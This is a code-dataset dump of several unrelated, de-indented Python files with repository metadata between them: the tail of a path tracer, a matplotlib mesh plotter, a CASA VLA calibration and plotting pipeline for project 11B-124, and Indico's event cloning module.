elif obj.refl == Refl.SPEC: # Ideal SPECULAR reflection
return obj.e + f.mult(radiance(Ray(x, r.d - n * (2 * n ** r.d)), newDepth))
else: # Ideal dielectric REFRACTION
reflRay = Ray(x, r.d - n * (2 * n ** r.d))
into = n ** nl > 0 # from outside going in?
nc = 1
nt = 1.5
nnt = into and nc / nt or nt / nc
ddn = r.d ** nl
cos2t = 1 - nnt * nnt * (1 - ddn * ddn)
if cos2t < 0: # Total internal reflection
return obj.e + f.mult(radiance(reflRay, newDepth))
else:
tdir = (r.d * nnt - n * ((into and 1 or -1) * (ddn * nnt + math.sqrt(cos2t)))).norm()
a = nt - nc
b = nt + nc
R0 = a * a / (b * b)
c = 1 - (into and -ddn or tdir ** n)
Re = R0 + (1 - R0) * c * c * c * c * c
Tr = 1 - Re
P = .25 + .5 * Re
RP = Re / P
TP = Tr / (1 - P)
if newDepth > 2:
# Russian roulette and splitting for selecting reflection and/or refraction
if rand() < P:
result = radiance(reflRay, newDepth) * RP
else:
result = radiance(Ray(x, tdir), newDepth) * TP
else:
result = radiance(reflRay, newDepth)* Re + radiance(Ray(x, tdir), newDepth) * Tr
return obj.e + f.mult(result)
start = time.clock()
w = 256
h = 256
if len(sys.argv) == 2:
samps = int(sys.argv[1]) // 4  # integer division so range(samps) also works on Python 3
else:
samps = 25
# cam pos, dir
cam = Ray(Vec(50, 52, 295.6), Vec(0, -0.042612, -1).norm())
cx = Vec(w * .5135 / h, 0, 0)
cy = (cx % cam.d).norm() * .5135
# final color buffer
c = {}
# Loop over image rows
for y in range(0, h):
sys.stderr.write('\rRendering ({0} spp) {1:2.2%}'.format(samps * 4, y / (h - 1)))
# Loop cols
for x in range(0, w):
i = (h - y - 1) * w + x
c[i] = Vec.Zero
# 2x2 subpixel rows
for sy in range (0, 2):
# 2x2 subpixel cols
for sx in range (0, 2):
r = Vec.Zero
for s in range(samps):
r1 = 2 * rand()
r2 = 2 * rand()
dx = (r1 < 1) and (math.sqrt(r1) - 1) or (1 - math.sqrt(2 - r1))
dy = (r2 < 1) and (math.sqrt(r2) - 1) or (1 - math.sqrt(2 - r2))
d = cx * (((sx + .5 + dx) / 2 + x) / w - .5) + \
cy * (((sy + .5 + dy) / 2 + y) / h - .5) + cam.d
# Camera rays are pushed forward to start in interior
camRay = Ray(cam.o + d * 140, d.norm())
# Accumulate radiance
r = r + radiance(camRay, 0) * (1.0 / samps)
# Convert radiance to color
c[i] = c[i] + Vec(clamp(r.x), clamp(r.y), clamp(r.z)) * .25
print('\n{0} sec'.format(time.clock() - start))
f = open('image.ppm', 'w')
f.write('P3\n{0} {1}\n{2}\n'.format(w, h, 255))
for i in range(0, w * h):
f.write('{0} {1} {2}\n'.format(toInt(c[i].x), toInt(c[i].y), toInt(c[i].z)))
| 25.410359
| 99
| 0.544528
|
7761738a1da0bc0113005a44c7ad89060e1eaaed
| 8,212
|
py
|
Python
|
plotter/opt_mesh.py
|
tttor/nbwpg
|
271718362cf0cd810c7ea0cd9726e77276947e58
|
[
"MIT"
] | null | null | null |
plotter/opt_mesh.py
|
tttor/nbwpg
|
271718362cf0cd810c7ea0cd9726e77276947e58
|
[
"MIT"
] | null | null | null |
plotter/opt_mesh.py
|
tttor/nbwpg
|
271718362cf0cd810c7ea0cd9726e77276947e58
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# https://matplotlib.org/3.1.1/gallery/images_contours_and_fields/multi_image.html#sphx-glr-gallery-images-contours-and-fields-multi-image-py
# https://matplotlib.org/3.3.2/api/_as_gen/matplotlib.axes.Axes.imshow.html#matplotlib.axes.Axes.imshow
# https://stackoverflow.com/questions/5263034/remove-colorbar-from-figure-in-matplotlib
# https://matplotlib.org/3.1.1/gallery/pyplots/text_layout.html#sphx-glr-gallery-pyplots-text-layout-py
# https://stackoverflow.com/questions/52767798/reduce-horizontal-colorbar-padding
import os, pickle, argparse, yaml
import numpy as np, matplotlib.pyplot as plt, matplotlib as mpl
import util_bwopt_plotter as u
def main():
arg = parse_arg()
with open(os.path.join(arg.cfg), 'r') as f:
cfg = yaml.safe_load(f)
envcfg_dpath = os.path.join(arg.gymdir, 'gym-symbol/gym_symbol/envs/config')
envcfg_fname = cfg['envid'].replace('-', '_').lower() + '.yaml'
with open(os.path.join(envcfg_dpath, envcfg_fname), 'r') as f2:
envcfg = yaml.safe_load(f2)
cfg = {**cfg, **envcfg['deterministic_policy']}
print(cfg)
for spec_idx, spec in enumerate(cfg['spec_list']):
print('plotting spec_idx', spec_idx, len(cfg['spec_list'])-1, '=======')
plot(spec, cfg, arg)
def plot(spec, cfg, arg):
print('loading...')
def check_spec(cfg):
for k, v in spec.items():
if cfg[k] != v:
return False
return True
logdir = os.path.dirname(arg.cfg); datadir = os.path.join(logdir, 'data')
zs_list = []; seed_list = []
for mesh_fname in os.listdir(datadir):
if '.pkl' not in mesh_fname:
continue
with open(os.path.join(datadir, mesh_fname), 'rb') as f:
meshdata = pickle.load(f); seed = meshdata['seed']
# print(meshdata.keys()); print(meshdata['cfg']); exit()
if not(check_spec(meshdata['cfg'])):
continue
if ('commonseed_list' in cfg.keys()) and (seed not in cfg['commonseed_list']):
continue
print(mesh_fname[0:200], seed)
seed_list.append(seed)
xs, ys = meshdata['wxmat'], meshdata['wymat'] # the parameter(=[weight, bias]) mesh
obj = arg.data.split('_')[0]
zs = meshdata[obj]
zs, x_sorted, y_sorted = u.arrange_mesh2mat(xs, ys, zs, meshdata['cfg']['round_decimal'])
if obj == 'disc':
gamma = meshdata['discountfactor'][0, 0] # same for all mesh coordinates
zs = (1 - gamma)*zs
if '_diff' in arg.data:
if obj=='disc':
gamma_str = '{:.2f}'.format(gamma) if (gamma <= 0.99) else '{:.8f}'.format(gamma)
max_value = (1 - gamma)*cfg['ds0_'+gamma_str+'_max']
elif obj=='bias':
max_value = cfg['bs0max_gainmax']
else:
raise NotImplementedError(obj)
zs = max_value - zs
if '_ratio' in arg.data:
zs = zs/max_value
if '_abs' in arg.data:
zs = np.abs(zs)
zs_list.append(zs)
seed_list = sorted(seed_list)
print(len(seed_list), seed_list, 'commonseed=', 'commonseed_list' in cfg.keys())
assert len(seed_list) > 0; assert len(set(seed_list))>=len(seed_list)
zs = np.nanmean(np.stack(zs_list), axis=u.sample_dimth)
u.print_stat(zs, tag=arg.data); # print('x_sorted', x_sorted); print('y_sorted', y_sorted)
print('plotting mat', arg.data)
fig, ax = plt.subplots(figsize=(12, 9))
label_fontsize = 25; tick_fontsize = 20
text_halign = 'center'; text_valign = 'center'
try:
text_size = cfg['text_size'][arg.data]
except:
text_size = 60
if arg.data.replace('_abs', '').replace('_ratio', '') in ['bias_diff', 'gain_diff', 'disc_diff']:
cmap = mpl.cm.cool
elif arg.data in ['fval', 'bias', 'gain', 'disc', 'gainopt_fval']:
cmap = mpl.cm.plasma
elif arg.data in ['gainopt_converged', 'rollback']:
cmap = mpl.cm.rainbow
else:
raise NotImplementedError(arg.data)
assert arg.data in cfg['colorbar_ticks'] # decided to strictly enforce this
if arg.data in cfg['colorbar_ticks']:
cb_ticks = cfg['colorbar_ticks'][arg.data]
cb_tickmin = min(cfg['colorbar_ticks'][arg.data])
cb_tickmax = max(cfg['colorbar_ticks'][arg.data])
print("cfg['colorbar_ticks']['force']", cfg['colorbar_ticks']['force'])
if cfg['colorbar_ticks']['force']:
print('WARN: affect the statistic that will be taken later!')
zs[zs < cb_tickmin] = cb_tickmin; zs[zs > cb_tickmax] = cb_tickmax
else:
assert (zs[~np.isnan(zs)] <= cb_tickmax).all()
assert (zs[~np.isnan(zs)] >= cb_tickmin).all()
else:
cb_tickmin = min(zs[~np.isnan(zs)])
cb_tickmax = max(zs[~np.isnan(zs)])
cb_ticks = [cb_tickmin, cb_tickmax]
print('cb_tickmin {} cb_tickmax {}'.format(cb_tickmin, cb_tickmax))
norm = mpl.colors.Normalize(vmin=cb_tickmin, vmax=cb_tickmax)
cax = ax.matshow(zs, origin='lower', cmap=cmap, interpolation='none', norm=norm)
cb = fig.colorbar(cax, ticks=cb_ticks, label='', pad=0.01)
if arg.cbar==0:
cb.remove()
info = r'${:.3f} \pm {:.3f}$'.format(np.nanmean(zs), np.nanstd(zs))
ax.text(0.5, 0.5, info,
fontdict={'size': text_size, 'family': 'serif', 'color': 'black', 'weight': 'normal'},
horizontalalignment=text_halign, verticalalignment=text_valign, transform=ax.transAxes)
# ax.set_xlabel('1st weight $(x)$', fontsize=label_fontsize)
# ax.set_ylabel('2nd weight $(y)$', fontsize=label_fontsize)
if ('xticks' in cfg.keys()) and ('yticks' in cfg.keys()):
xticktargets = cfg['xticks']
xticks = [x_sorted.index(i) for i in xticktargets]
xticklabels = ['{:.1f}'.format(i) for i in xticktargets]
yticktargets = cfg['yticks']
yticks = [y_sorted.index(i) for i in yticktargets]
yticklabels = ['{:.1f}'.format(i) for i in yticktargets]
ax.set_xticks(xticks); ax.set_xticklabels(xticklabels)
ax.set_yticks(yticks); ax.set_yticklabels(yticklabels)
ax.tick_params(axis="x", bottom=True, top=False, labelbottom=True, labeltop=False, labelsize=tick_fontsize)
ax.tick_params(axis="y", labelsize=tick_fontsize)
ax.grid(axis='both'); ax.set_aspect('auto')
print('writing')
envid = u.get_shortenvid(meshdata['cfg']['envid'])
polnet = meshdata['cfg']['polnet']['mode']
tag = [arg.data] + ['{}={}'.format(k, v) for k, v in spec.items()]
tag += ['nseed{}'.format(len(zs_list)), polnet, envid]
fname = '__'.join(tag)
plt.savefig(os.path.join(logdir, fname + '.png'), dpi=300, bbox_inches='tight')
plt.close(fig)
if arg.cbarx==1:
print('writing colorbar standalone ...')
fig = plt.figure(figsize=(12, 9))
ax = fig.add_axes([0.05, 0.05, 0.05, 0.9])
cb = mpl.colorbar.ColorbarBase(ax, cmap=cmap, norm=norm, orientation='vertical',
ticks=cfg['colorbar_ticks'][arg.data])
# cb.set_label(label='Bias $v_b(s_0, \mathbf{\\theta})$ at the final iteration', fontsize=label_fontsize)
for yt in cb.ax.get_yticklabels():
yt.set_fontsize(tick_fontsize)
fname = '__'.join([fname, 'colorbar'])
plt.savefig(os.path.join(logdir, fname + '.png'), dpi=300, bbox_inches='tight')
plt.close(fig)
def parse_arg():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--cfg', help='config fpath', type=str, default=None, required=True)
parser.add_argument('--data', help='data type', type=str, default=None, required=True)
parser.add_argument('--gymdir', help='customized gym-env dir', type=str, required=True)
parser.add_argument('--cbar', help='colorbar mode', type=int, default=1)
parser.add_argument('--cbarx', help='colorbar: standalone', type=int, default=0)
arg = parser.parse_args()
arg.cfg = arg.cfg.replace('file://','')
return arg
if __name__ == '__main__':
main()
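A hedged example of how the plotter above is typically invoked; every path and flag value is a placeholder.
# python3 opt_mesh.py --cfg /home/user/logs/mesh/cfg.yaml --data bias_diff \
#     --gymdir /home/user/code --cbar 1 --cbarx 0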
| 47.744186
| 141
| 0.61471
|
b8e3ee3f320078e0944e2cd41cbb180eac8d6b49
| 16,825
|
py
|
Python
|
11B-124/pipeline_scripts/casa_pipeline_lines.py
|
Astroua/LocalGroup-VLA
|
4920341c9e25343d724fb4a2e37cdcd234201047
|
[
"MIT"
] | 1
|
2019-04-11T00:37:56.000Z
|
2019-04-11T00:37:56.000Z
|
11B-124/pipeline_scripts/casa_pipeline_lines.py
|
Astroua/LocalGroup-VLA
|
4920341c9e25343d724fb4a2e37cdcd234201047
|
[
"MIT"
] | null | null | null |
11B-124/pipeline_scripts/casa_pipeline_lines.py
|
Astroua/LocalGroup-VLA
|
4920341c9e25343d724fb4a2e37cdcd234201047
|
[
"MIT"
] | null | null | null |
import sys
import os
from glob import glob
import shutil
import numpy as np
from shutil import copyfile
from tasks import plotms, importasdm
# This is my adaptation of the editIntents function in the
# NRAO analysis_scripts for VLA intents instead of ALMA
# https://github.com/e-koch/VLA_Lband/blob/master/CASA_functions/editIntents_EVLA.py
from editIntents_EVLA import editIntents as editIntents_VLA
mySDM = sys.argv[-1]
myvis = mySDM if mySDM.endswith("ms") else mySDM + ".ms"
# Look for a custom flagging script in the repo and copy over.
parentdir = os.getcwd().split("/")[-1]
flag_filename = "{}_lines_flags.txt".format(parentdir)
flag_path = os.path.expanduser("~/LocalGroup-VLA/11B-124/pipeline_scripts/track_flagging")
full_flag_filename = os.path.join(flag_path, flag_filename)
if os.path.exists(full_flag_filename):
copyfile(full_flag_filename,
"additional_flagging.txt")
else:
print("No additional flagging script found in the VLA_Lband repo"
" for lines.")
# Before running the pipeline, convert the SDM to an MS file
# and correct the scan intents
importasdm(asdm=mySDM, vis=myvis, ocorr_mode='co',
applyflags=True, savecmds=True, tbuff=1.5,
outfile='{}.flagonline.txt'.format(mySDM),
createmms=False)
# Remove gain cal from 3C48 scans
editIntents_VLA(msName=myvis, field='3C48',
newintents='BANDPASS,DELAY,FLUX')
# First scan is setup
editIntents_VLA(msName=myvis, field='3C48', scan='1',
newintents='SYS_CONFIG')
# And the gain cal only has phases specified. Need amp too
editIntents_VLA(msName=myvis, field='J0029+3456',
newintents='AMPLITUDE', append=True)
# if not os.path.exists("cont.dat"):
# raise ValueError("The cont.dat file is not in the pipeline directory.")
__rethrow_casa_exceptions = True
context = h_init()
context.set_state('ProjectSummary', 'observatory',
'Karl G. Jansky Very Large Array')
context.set_state('ProjectSummary', 'telescope', 'EVLA')
context.set_state('ProjectSummary', 'proposal_code', '11B-124')
context.set_state('ProjectSummary', 'piname', 'Adam Leroy')
try:
hifv_importdata(ocorr_mode='co', nocopy=False, vis=[myvis],
createmms='automatic', asis='Receiver CalAtmosphere',
overwrite=False)
# Hanning smoothing is turned off in the following step.
# In the case of extreme RFI, Hanning smoothing, however,
# may still be required.
# Avoid Hanning smoothing spectral lines
# hifv_hanning(pipelinemode="automatic")
# Online flags applied when importing ASDM
hifv_flagdata(intents='*POINTING*,*FOCUS*,*ATMOSPHERE*,*SIDEBAND_RATIO*, \
*UNKNOWN*, *SYSTEM_CONFIGURATION*, \
*UNSPECIFIED#UNSPECIFIED*',
flagbackup=False, scan=True, baseband=True, clip=True,
autocorr=True,
hm_tbuff='1.5int', template=True,
filetemplate="additional_flagging.txt",
online=False, tbuff=0.0,
fracspw=0.05, shadow=True, quack=True, edgespw=True)
# Add extra quack for the first 3C48 scan and scans after longer slews
# May need to be adjusted for this. Seem to need ~30 s more after online
# flags indicate
# flagdata(vis=myvis, flagbackup=False, mode='quack', scan='2',
# quackinterval=270.0)
# flagdata(vis=myvis, flagbackup=False, mode='quack',
# scan='3,11,19,27,35,43,51,59,67,75,83,91,99',
# quackinterval=14.0)
# flagdata(vis=myvis, flagbackup=False, mode='quack',
# scan='100',
# quackinterval=70.0)
# flagdata(vis=myvis, flagbackup=False, mode='quack',
# scan='100,101',
# quackinterval=100.0)
# flagmanager(vis=myvis, mode='save', versionname="extra_quacking",
# comment="Extra long-slew quacking.")
hifv_vlasetjy(fluxdensity=-1, scalebychan=True, reffreq='1GHz', spix=0)
hifv_priorcals(tecmaps=False)
hifv_testBPdcals(weakbp=False, refantignore='')
hifv_flagbaddef(pipelinemode="automatic")
hifv_checkflag(pipelinemode="automatic")
# NOTE we need to flag HI absorption in the bandpass here
# I *think* we can run a custom bandpass cmd here and pass
# the name of the table to 'bpcaltable' in applycal
# bpcaltable = same as pipeline name
# bandpass(fillgap=# chan flagged)
# hifv_semiFinalBPdcals(weakbp=False, refantignore='',
# bpcaltable=bpcaltable)
#
hifv_semiFinalBPdcals(weakbp=False, refantignore='')
hifv_checkflag(checkflagmode='semi')
hifv_semiFinalBPdcals(weakbp=False, refantignore='')
hifv_solint(pipelinemode="automatic", refantignore='')
hifv_fluxboot(pipelinemode="automatic", refantignore='')
hifv_finalcals(weakbp=False, refantignore='')
hifv_applycals(flagdetailedsum=True, gainmap=False, flagbackup=True, flagsum=True)
# Keep the following two steps in the script if cont.dat exists.
# Otherwise we recommend to comment out the next two tasks,
# or at least remove '*TARGET*' from the hifv_targetflag call
if os.path.exists('cont.dat'):
hifv_targetflag(intents='*CALIBRATE*, *TARGET*')
hifv_statwt(pipelinemode="automatic")
else:
hifv_targetflag(intents='*CALIBRATE*')
hifv_plotsummary(pipelinemode="automatic")
hif_makeimlist(nchan=-1, calmaxpix=300, intent='PHASE,BANDPASS')
hif_makeimages(tlimit=2.0, hm_minbeamfrac=-999.0, hm_dogrowprune=True,
hm_negativethreshold=-999.0, calcsb=False, target_list={},
hm_noisethreshold=-999.0, hm_masking='none', hm_minpercentchange=-999.0,
parallel='automatic', masklimit=4, hm_lownoisethreshold=-999.0,
hm_growiterations=-999, cleancontranges=False, hm_sidelobethreshold=-999.0)
# Make a folder of products for restoring the pipeline solution
os.mkdir('products/')
hifv_exportdata(products_dir='products/')
finally:
h_save()
# Make a new directory for the imaging outputs
if not os.path.exists("image_outputs"):
os.mkdir("image_outputs")
image_files = glob("oussid*")
for fil in image_files:
shutil.move(fil, "image_outputs/")
# Now make a bunch of scan plots to make it easier to identify bad data
ms_active = myvis
# Plot the bandpasses per SPW as well
bp_folder = "finalBPcal_plots"
if not os.path.exists(bp_folder):
os.mkdir(bp_folder)
tb.open(ms_active + "/SPECTRAL_WINDOW")
nspws = tb.getcol("NAME").shape[0]
tb.close()
# Final BP cal table now includes the stage number and step
finalbpcal_name = glob(mySDM + '*.finalBPcal.tbl')
if len(finalbpcal_name) == 0:
raise ValueError("Cannot find finalBPcal table name.")
# Blindly assume we want the first name
finalbpcal_name = finalbpcal_name[0]
for ii in range(nspws):
filename = 'finalBPcal_amp_spw_' + str(ii) + '.png'
syscommand = 'rm -rf ' + filename
os.system(syscommand)
default('plotcal')
caltable = finalbpcal_name
xaxis = 'freq'
yaxis = 'amp'
poln = ''
field = ''
antenna = ''
spw = str(ii)
timerange = ''
subplot = 111
overplot = False
clearpanel = 'Auto'
iteration = ''
showflags = False
plotsymbol = 'o'
plotcolor = 'blue'
markersize = 5.0
fontsize = 10.0
showgui = False
figfile = os.path.join(bp_folder, filename)
async = False
plotcal()
for ii in range(nspws):
filename = 'finalBPcal_phase_spw_' + str(ii) + '.png'
syscommand = 'rm -rf ' + filename
os.system(syscommand)
antPlot = str(ii * 3) + '~' + str(ii * 3 + 2)
default('plotcal')
caltable = finalbpcal_name
xaxis = 'freq'
yaxis = 'phase'
poln = ''
field = ''
antenna = ''
spw = str(ii)
timerange = ''
subplot = 111
overplot = False
clearpanel = 'Auto'
iteration = ''
# plotrange=[0,0,-phaseplotmax,phaseplotmax]
showflags = False
plotsymbol = 'o'
plotcolor = 'blue'
markersize = 5.0
fontsize = 10.0
showgui = False
figfile = os.path.join(bp_folder, filename)
async = False
plotcal()
# SPWs to loop through
tb.open(os.path.join(ms_active, "SPECTRAL_WINDOW"))
spws = range(len(tb.getcol("NAME")))
nchans = tb.getcol('NUM_CHAN')
tb.close()
# Read the field names
tb.open(os.path.join(ms_active, "FIELD"))
names = tb.getcol('NAME')
numFields = tb.nrows()
tb.close()
# Intent names
tb.open(os.path.join(ms_active, 'STATE'))
intentcol = tb.getcol('OBS_MODE')
tb.close()
tb.open(ms_active)
scanNums = np.unique(tb.getcol('SCAN_NUMBER'))
field_scans = []
is_calibrator = np.empty_like(scanNums, dtype='bool')
is_all_flagged = np.empty((len(spws), len(scanNums)), dtype='bool')
for ii in range(numFields):
subtable = tb.query('FIELD_ID==%s' % ii)
field_scan = np.unique(subtable.getcol('SCAN_NUMBER'))
field_scans.append(field_scan)
# Is the intent for calibration?
scan_intents = intentcol[np.unique(subtable.getcol("STATE_ID"))]
is_calib = False
for intent in scan_intents:
if "CALIBRATE" in intent:
is_calib = True
break
is_calibrator[field_scan - 1] = is_calib
# Are any of the scans completely flagged?
for spw in spws:
for scan in field_scan:
scantable = \
tb.query("SCAN_NUMBER=={0} AND DATA_DESC_ID=={1}".format(scan,
spw))
if scantable.getcol("FLAG").all():
is_all_flagged[spw, scan - 1] = True
else:
is_all_flagged[spw, scan - 1] = False
tb.close()
# Make folder for scan plots
scan_dir = "scan_plots"
if not os.path.exists(scan_dir):
os.mkdir(scan_dir)
for spw_num in spws:
print("On SPW {}".format(spw))
# Plotting the HI spw (0) takes so so long.
# Make some simplifications to save time
if spw_num == 0:
avg_chan = "4"
else:
avg_chan = "1"
spw_folder = os.path.join(scan_dir, "spw_{}".format(spw_num))
if not os.path.exists(spw_folder):
os.mkdir(spw_folder)
else:
# Make sure any old plots are removed first.
os.system("rm {}/*.png".format(spw_folder))
for ii in range(len(field_scans)):
print("On field {}".format(names[ii]))
for jj in field_scans[ii]:
# Check if all of the data is flagged.
if is_all_flagged[spw_num, jj - 1]:
print("All data flagged in SPW {0} scan {1}"
.format(spw_num, jj))
continue
print("On scan {}".format(jj))
# Amp vs. time
default('plotms')
vis = ms_active
xaxis = 'time'
yaxis = 'amp'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
avgchannel = str(avg_chan)
correlation = "RR,LL"
averagedata = True
avgbaseline = True
transform = False
extendflag = False
plotrange = []
title = 'Amp vs Time: Field {0} Scan {1}'.format(names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_amp_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Amp vs. channel
default('plotms')
vis = ms_active
xaxis = 'chan'
yaxis = 'amp'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
avgchannel = str(avg_chan)
avgtime = "1e8"
correlation = "RR,LL"
averagedata = True
avgbaseline = True
transform = False
extendflag = False
plotrange = []
title = 'Amp vs Chan: Field {0} Scan {1}'.format(names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_amp_chan_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Plot amp vs uvdist
default('plotms')
vis = ms_active
xaxis = 'uvdist'
yaxis = 'amp'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
avgchannel = str(4096)
avgtime = '1e8'
correlation = "RR,LL"
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Amp vs UVDist: Field {0} Scan {1}'.format(names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_amp_uvdist_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Skip the phase plots for the HI SPW (0)
if is_calibrator[jj - 1] and spw_num != 0:
# Plot phase vs time
default('plotms')
vis = ms_active
xaxis = 'time'
yaxis = 'phase'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
correlation = "RR,LL"
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Phase vs Time: Field {0} Scan {1}'.format(
names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_phase_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Plot phase vs channel
default('plotms')
vis = ms_active
xaxis = 'chan'
yaxis = 'phase'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
correlation = "RR,LL"
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Phase vs Chan: Field {0} Scan {1}'.format(
names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_phase_chan_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
# Plot phase vs uvdist
default('plotms')
vis = ms_active
xaxis = 'uvdist'
yaxis = 'phase'
ydatacolumn = 'corrected'
selectdata = True
field = names[ii]
scan = str(jj)
spw = str(spw_num)
correlation = "RR,LL"
avgchannel = "4096"
avgtime = '1e8'
averagedata = True
avgbaseline = False
transform = False
extendflag = False
plotrange = []
title = 'Phase vs UVDist: Field {0} Scan {1}'.format(
names[ii], jj)
xlabel = ''
ylabel = ''
showmajorgrid = False
showminorgrid = False
plotfile = os.path.join(
spw_folder, 'field_{0}_phase_uvdist_scan_{1}.png'.format(names[ii], jj))
overwrite = True
showgui = False
async = False
plotms()
| 34.127789
| 94
| 0.569866
|
f170a287bd0cad698f50c76096502453b3760b50
| 6,883
|
py
|
Python
|
indico/modules/events/clone.py
|
bkmgit/indico
|
d77ee121e35880a416b9b05e6098ea912d870b5c
|
[
"MIT"
] | 1
|
2021-06-11T20:02:10.000Z
|
2021-06-11T20:02:10.000Z
|
indico/modules/events/clone.py
|
bkmgit/indico
|
d77ee121e35880a416b9b05e6098ea912d870b5c
|
[
"MIT"
] | null | null | null |
indico/modules/events/clone.py
|
bkmgit/indico
|
d77ee121e35880a416b9b05e6098ea912d870b5c
|
[
"MIT"
] | null | null | null |
# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.core import signals
from indico.core.db import db
from indico.core.db.sqlalchemy.principals import clone_principals
from indico.core.db.sqlalchemy.util.models import get_simple_column_attrs
from indico.modules.events.cloning import EventCloner
from indico.modules.events.models.events import EventType
from indico.modules.events.models.persons import EventPerson, EventPersonLink
from indico.modules.events.models.principals import EventPrincipal
from indico.modules.events.sessions import session_settings
from indico.modules.events.util import track_location_changes
from indico.util.i18n import _
class EventLocationCloner(EventCloner):
name = 'event_location'
friendly_name = _('Venue/Room')
is_default = True
@property
def is_available(self):
return self._has_content(self.old_event)
def get_conflicts(self, target_event):
if self._has_content(target_event):
return [_('The target event already has a venue/room')]
def run(self, new_event, cloners, shared_data, event_exists=False):
with db.session.no_autoflush:
self._clone_location(new_event)
db.session.flush()
def _has_content(self, event):
return event.has_location_info
def _clone_location(self, new_event):
with track_location_changes():
new_event.location_data = self.old_event.location_data
db.session.flush()
class EventPersonCloner(EventCloner):
name = 'event_persons'
friendly_name = _('Persons')
is_internal = True
is_default = True
# We do not override `is_available` as we have cloners depending
# on this internal cloner even if it won't clone anything.
def get_conflicts(self, target_event):
if target_event.persons.has_rows():
return [_('The target event already has persons')]
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = {}
with db.session.no_autoflush:
self._clone_persons(new_event)
db.session.flush()
return {'person_map': self._person_map}
def _clone_persons(self, new_event):
attrs = get_simple_column_attrs(EventPerson) | {'user'}
for old_person in self.old_event.persons:
person = EventPerson(event=new_event)
person.populate_from_attrs(old_person, attrs)
assert person not in db.session
self._person_map[old_person] = person
class EventPersonLinkCloner(EventCloner):
name = 'event_person_links'
requires = {'event_persons'}
is_default = True
@property
def friendly_name(self):
if self.old_event.type_ == EventType.lecture:
return _('Speakers')
else:
return _('Chairpersons')
@property
def is_available(self):
return self._has_content(self.old_event)
def get_conflicts(self, target_event):
if self._has_content(target_event):
if self.old_event.type_ == EventType.lecture:
return [_('The target event already has speakers')]
else:
return [_('The target event already has chairpersons')]
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = shared_data['event_persons']['person_map']
with db.session.no_autoflush:
self._clone_person_links(new_event)
db.session.flush()
def _has_content(self, event):
return bool(event.person_links)
def _clone_person_links(self, new_event):
attrs = get_simple_column_attrs(EventPersonLink)
for old_link in self.old_event.person_links:
link = EventPersonLink()
link.populate_from_attrs(old_link, attrs)
link.person = self._person_map[old_link.person]
new_event.person_links.append(link)
class EventProtectionCloner(EventCloner):
name = 'event_protection'
friendly_name = _('ACLs and protection settings')
is_default = True
uses = {'event_roles', 'registration_forms'}
def get_conflicts(self, target_event):
conflicts = []
if target_event.access_key != '':
conflicts.append(_('The target event already has an access key'))
entries = list(target_event.acl_entries)
if len(entries) != 1 or entries[0].user != target_event.creator:
conflicts.append(_('The target event already has a custom ACL'))
return conflicts
def run(self, new_event, cloners, shared_data, event_exists=False):
self._event_role_map = shared_data['event_roles']['event_role_map'] if 'event_roles' in cloners else None
self._regform_map = shared_data['registration_forms']['form_map'] if 'registration_forms' in cloners else None
with db.session.no_autoflush:
self._clone_protection(new_event)
self._clone_session_coordinator_privs(new_event)
self._clone_acl(new_event, event_exists)
self._clone_visibility(new_event)
db.session.flush()
if event_exists:
signals.acl.protection_changed.send(type(new_event), obj=new_event, mode=new_event.protection_mode,
old_mode=None)
def _clone_protection(self, new_event):
new_event.protection_mode = self.old_event.protection_mode
new_event.access_key = self.old_event.access_key
def _clone_visibility(self, new_event):
new_event.visibility = self.old_event.visibility if new_event.category == self.old_event.category else None
def _clone_session_coordinator_privs(self, new_event):
session_settings_data = session_settings.get_all(self.old_event)
session_settings.set_multi(new_event, {
'coordinators_manage_contributions': session_settings_data['coordinators_manage_contributions'],
'coordinators_manage_blocks': session_settings_data['coordinators_manage_blocks']
})
def _clone_acl(self, new_event, event_exists):
if event_exists:
acl_entries = {principal for principal in self.old_event.acl_entries if principal.user != new_event.creator}
new_event.acl_entries = clone_principals(EventPrincipal, acl_entries,
self._event_role_map, self._regform_map)
db.session.flush()
new_event.update_principal(new_event.creator, full_access=True)
else:
new_event.acl_entries = clone_principals(EventPrincipal, self.old_event.acl_entries,
self._event_role_map, self._regform_map)
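A hedged sketch of the same cloner pattern applied to a hypothetical piece of event data; the keywords attribute and conflict message are invented for illustration, while the class attributes and hooks mirror the cloners above.
class EventKeywordsCloner(EventCloner):
    name = 'event_keywords'
    friendly_name = _('Keywords')
    is_default = True

    def get_conflicts(self, target_event):
        if target_event.keywords:
            return [_('The target event already has keywords')]

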